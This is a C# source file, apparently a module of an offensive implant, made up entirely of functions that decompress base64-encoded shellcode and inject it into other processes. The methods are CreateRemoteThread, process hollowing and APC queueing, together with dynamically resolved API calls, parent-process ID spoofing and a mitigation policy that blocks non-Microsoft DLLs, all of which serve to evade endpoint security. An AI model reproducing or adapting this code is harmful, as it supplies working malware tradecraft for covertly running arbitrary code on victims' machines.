public static string InjectCreateRemThread(string[] arguments) { byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1])); int targetId = Int32.Parse(arguments[2]); uint oldProtect = 0; GCHandle handle = GCHandle.Alloc(buffer, GCHandleType.Pinned); IntPtr pinnedBuffer = handle.AddrOfPinnedObject(); try { IntPtr lpNumberOfBytesWritten = IntPtr.Zero; IntPtr lpThreadId = IntPtr.Zero; IntPtr procHandle = Interop.OpenProcess((uint)flags.ProcessAccessRights.All, false, (uint)targetId); IntPtr remoteAddr = Interop.VirtualAllocEx(procHandle, IntPtr.Zero, buffer.Length, (uint)flags.MemAllocation.MEM_COMMIT, (uint)flags.MemProtect.PAGE_READWRITE); if (Interop.WriteProcessMemory(procHandle, remoteAddr, pinnedBuffer, buffer.Length, out lpNumberOfBytesWritten)) { Interop.VirtualProtectEx(procHandle, remoteAddr, buffer.Length, (uint)flags.MemProtect.PAGE_EXECUTE_READ, out oldProtect); Interop.CreateRemoteThread(procHandle, IntPtr.Zero, 0, remoteAddr, IntPtr.Zero, 0, out lpThreadId); handle.Free(); } else { return("Failed to inject shellcode!"); } } catch (Exception ex) { return(ex.Message); } return(null); }
public static string ProcHollowRun(string[] arguments) { string targetProcess = arguments[2].Replace('+', ' '); byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1])); ProcessHollowing prochollow = new ProcessHollowing(); prochollow.Hollow(targetProcess, buffer); return(null); }
public static string InjectAPC(string[] arguments) { string targetProcess = arguments[2].Replace('+', ' '); byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1])); IntPtr lpNumberOfBytesWritten = IntPtr.Zero; IntPtr lpThreadId = IntPtr.Zero; uint oldProtect = 0; STARTUPINFOEX si = new STARTUPINFOEX(); flags.PROCESS_INFORMATION pi = new flags.PROCESS_INFORMATION(); var processSecurity = new flags.SECURITY_ATTRIBUTES(); var threadSecurity = new flags.SECURITY_ATTRIBUTES(); processSecurity.nLength = Marshal.SizeOf(processSecurity); threadSecurity.nLength = Marshal.SizeOf(threadSecurity); GCHandle handle = GCHandle.Alloc(buffer, GCHandleType.Pinned); IntPtr pinnedBuffer = handle.AddrOfPinnedObject(); try { bool success = Interop.CreateProcess(targetProcess, null, ref processSecurity, ref threadSecurity, false, flags.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT | flags.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi); IntPtr resultPtr = Interop.VirtualAllocEx(pi.hProcess, IntPtr.Zero, buffer.Length, MEM_COMMIT, PAGE_READWRITE); IntPtr bytesWritten = IntPtr.Zero; bool resultBool = Interop.WriteProcessMemory(pi.hProcess, resultPtr, pinnedBuffer, buffer.Length, out bytesWritten); IntPtr sht = Interop.OpenThread(flags.ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId); resultBool = Interop.VirtualProtectEx(pi.hProcess, resultPtr, buffer.Length, PAGE_EXECUTE_READ, out oldProtect); IntPtr ptr = Interop.QueueUserAPC(resultPtr, sht, IntPtr.Zero); IntPtr ThreadHandle = pi.hThread; Interop.ResumeThread(ThreadHandle); handle.Free(); } catch (Exception ex) { handle.Free(); Console.WriteLine(ex.Message); } return(null); }
public static string Dynamic_InjectCreateRemThread(string[] arguments) { byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1])); int targetId = Int32.Parse(arguments[2]); IntPtr lpNumberOfBytesWritten = IntPtr.Zero; IntPtr lpThreadId = IntPtr.Zero; uint oldProtect = 0; GCHandle handle = GCHandle.Alloc(buffer, GCHandleType.Pinned); IntPtr pinnedBuffer = handle.AddrOfPinnedObject(); try { var pointer = DynamicInvokeClass.GetLibraryAddress("kernel32.dll", "OpenProcess"); var openProcess = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DInterop.OpenProcess)) as DInterop.OpenProcess; var hProcess = openProcess((uint)flags.ProcessAccessRights.All, false, (uint)targetId); pointer = DynamicInvokeClass.GetLibraryAddress("kernel32.dll", "VirtualAllocEx"); var virtualAllocEx = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DInterop.VirtualAllocEx)) as DInterop.VirtualAllocEx; var alloc = virtualAllocEx(hProcess, IntPtr.Zero, buffer.Length, (uint)flags.MemAllocation.MEM_COMMIT, (uint)flags.MemProtect.PAGE_READWRITE); pointer = DynamicInvokeClass.GetLibraryAddress("kernel32.dll", "WriteProcessMemory"); var writeProcessMemory = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DInterop.WriteProcessMemory)) as DInterop.WriteProcessMemory; writeProcessMemory(hProcess, alloc, pinnedBuffer, buffer.Length, out lpNumberOfBytesWritten); pointer = DynamicInvokeClass.GetLibraryAddress("kernel32.dll", "VirtualProtectEx"); var virtualProtectex = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DInterop.VirtualProtectEx)) as DInterop.VirtualProtectEx; virtualProtectex(hProcess, alloc, buffer.Length, (uint)flags.MemProtect.PAGE_EXECUTE_READ, out oldProtect); pointer = DynamicInvokeClass.GetLibraryAddress("kernel32.dll", "CreateRemoteThread"); var createRemoteThread = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DInterop.CreateRemoteThread)) as DInterop.CreateRemoteThread; createRemoteThread(hProcess, IntPtr.Zero, 0, alloc, IntPtr.Zero, 0, out lpThreadId); handle.Free(); } catch (Exception ex) { return(ex.Message); } return(null); }
public static string PPidProcHollowRun(string[] arguments) { string targetProcess = arguments[2].Replace('+', ' '); byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1])); PPID.ParentPidSpoofing Parent = new PPID.ParentPidSpoofing(); PROCESS_INFORMATION pinf = Parent.ParentSpoofing(SearchPID.SearchForPPID(), targetProcess); ProcessHollowing hollow = new ProcessHollowing(); hollow.CreateSection((uint)buffer.Length); hollow.FindEntry(pinf.hProcess); hollow.SetLocalSection((uint)buffer.Length); hollow.CopyShellcode(buffer); hollow.MapAndStart(pinf); Interop.CloseHandle(pinf.hThread); Interop.CloseHandle(pinf.hProcess); return(null); }
public static string InjectAPCPPID(string[] arguments) { string targetProcess = arguments[2].Replace('+', ' '); byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1])); var blockMitigationPolicy = Marshal.AllocHGlobal(IntPtr.Size); int parentId = SearchPID.SearchForPPID(); IntPtr lpNumberOfBytesWritten = IntPtr.Zero; IntPtr lpThreadId = IntPtr.Zero; uint oldProtect = 0; var lpValueProc = IntPtr.Zero; STARTUPINFOEX siEx = new STARTUPINFOEX(); flags.PROCESS_INFORMATION pi = new flags.PROCESS_INFORMATION(); var processSecurity = new flags.SECURITY_ATTRIBUTES(); var threadSecurity = new flags.SECURITY_ATTRIBUTES(); processSecurity.nLength = Marshal.SizeOf(processSecurity); threadSecurity.nLength = Marshal.SizeOf(threadSecurity); GCHandle handle = GCHandle.Alloc(buffer, GCHandleType.Pinned); IntPtr pinnedBuffer = handle.AddrOfPinnedObject(); try { var lpSize = IntPtr.Zero; Interop.InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize); siEx.lpAttributeList = Marshal.AllocHGlobal(lpSize); Interop.InitializeProcThreadAttributeList(siEx.lpAttributeList, 2, 0, ref lpSize); if (IntPtr.Size == 4) { Marshal.WriteIntPtr(blockMitigationPolicy, IntPtr.Zero); } else { Marshal.WriteIntPtr(blockMitigationPolicy, new IntPtr((long)BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON)); } Interop.UpdateProcThreadAttribute(siEx.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, blockMitigationPolicy, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); var parentHandle = Interop.OpenProcess(flags.ProcessAccessRights.CreateProcess | flags.ProcessAccessRights.DuplicateHandle, false, parentId); lpValueProc = Marshal.AllocHGlobal(IntPtr.Size); Marshal.WriteIntPtr(lpValueProc, parentHandle); Interop.UpdateProcThreadAttribute(siEx.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValueProc, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); bool success = Interop.CreateProcess(targetProcess, null, ref processSecurity, ref threadSecurity, false, flags.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT | flags.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref siEx, out pi); IntPtr resultPtr = Interop.VirtualAllocEx(pi.hProcess, IntPtr.Zero, buffer.Length, MEM_COMMIT, PAGE_READWRITE); IntPtr bytesWritten = IntPtr.Zero; bool resultBool = Interop.WriteProcessMemory(pi.hProcess, resultPtr, pinnedBuffer, buffer.Length, out bytesWritten); IntPtr sht = Interop.OpenThread(flags.ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId); resultBool = Interop.VirtualProtectEx(pi.hProcess, resultPtr, buffer.Length, PAGE_EXECUTE_READ, out oldProtect); IntPtr ptr = Interop.QueueUserAPC(resultPtr, sht, IntPtr.Zero); IntPtr ThreadHandle = pi.hThread; Interop.ResumeThread(ThreadHandle); handle.Free(); } catch (Exception ex) { handle.Free(); Console.WriteLine(ex.Message); } return(null); }